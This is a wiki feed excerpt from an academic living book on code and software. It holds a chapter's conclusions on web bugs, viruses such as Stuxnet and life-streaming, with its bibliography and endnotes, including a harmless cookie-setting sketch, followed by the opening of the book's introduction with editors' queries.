The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but it also offers a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally amounts to the construction of a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time series of data points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticons (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. This self, however, is reconciled through the code and software that make the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narratives, through a stabilised web of meaning, for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed very productive knowledge can be generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software in order to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time, whilst secreting themselves within our computer systems, raises important questions. At the same time, users are actively downloading apps that advertise the fact that they collect this data, and seem genuinely to find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs, in many ways, are life streams, albeit life streams that have not been authorised by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want particularly to draw attention to this passive-aggressive feature of the computational agents that are collecting information: passive in quality – under the surface, relatively benign and silent – yet aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of conciseness in expression. The etymology, from the Latin for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003). &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, that is, to server computers designed specifically for the task and accessed via networks. Indeed, many viruses often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves, or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems, made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative orientation towards a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard, a relation that has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series-structured streams of real-time data, often organised as lists. Therefore the past (as stored data), the present (as current data collection, or processed archival data), and the future (as both the ethical addressee of the system and a potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering is itself a relatively recent discipline, and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy: the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship (ref: 211106), which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at Unlike Us in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapters in this book to: the PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; the ''Institutt for medier og kommunikasjon'' (IMK) seminar series, at the invitation of Espen Ytreberg, University of Oslo; the Digital Humanities Workshop, organised by Caroline Bassett, University of Sussex; the Media Innovations Colloquium, organised by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop at the ''Nasjonal Bibliotek'', organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0, Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume 6, Number 1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The Cyber-Road Not Taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012, http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Chicago: Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lumapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs), and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
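A small sketch of the mechanics Mittal describes, using only the Python standard library (the identifier value is of course invented): &lt;br /&gt;
&lt;pre&gt;
# Sketch of the cookie mechanics described above. The server sets a small
# piece of text; the browser returns it on every subsequent request to
# that domain until it expires or is reset. Identifier value is invented.
from http.cookies import SimpleCookie

# Server side: the Set-Cookie header attached to a response.
c = SimpleCookie()
c['uid'] = 'abc123'                       # opaque ID, well under 4 KB
c['uid']['max-age'] = 60 * 60 * 24 * 365  # persist for a year
print(c.output())   # Set-Cookie: uid=abc123; Max-Age=31536000

# Client side: the browser echoes the cookie back on later requests.
incoming = SimpleCookie('uid=abc123')
print(incoming['uid'].value)              # abc123
&lt;/pre&gt;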
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat]; (2) [http://www.google-analytics.com/ga.js Google Analytics]; (3) [http://o.aolcdn.com/omniunih.js Omniture]; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code disassembled from the worm, and careful analysis of the internal data structures and the finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad: careful analysis of background images accidentally photographed on computers used by the president confirmed the importance of the cascade structure, the centrifuge layout and the enriching process (see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] and Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is a suspicion that there may be three versions of the Stuxnet code, revised in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4694</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4694"/>
		<updated>2012-04-18T13:28:37Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
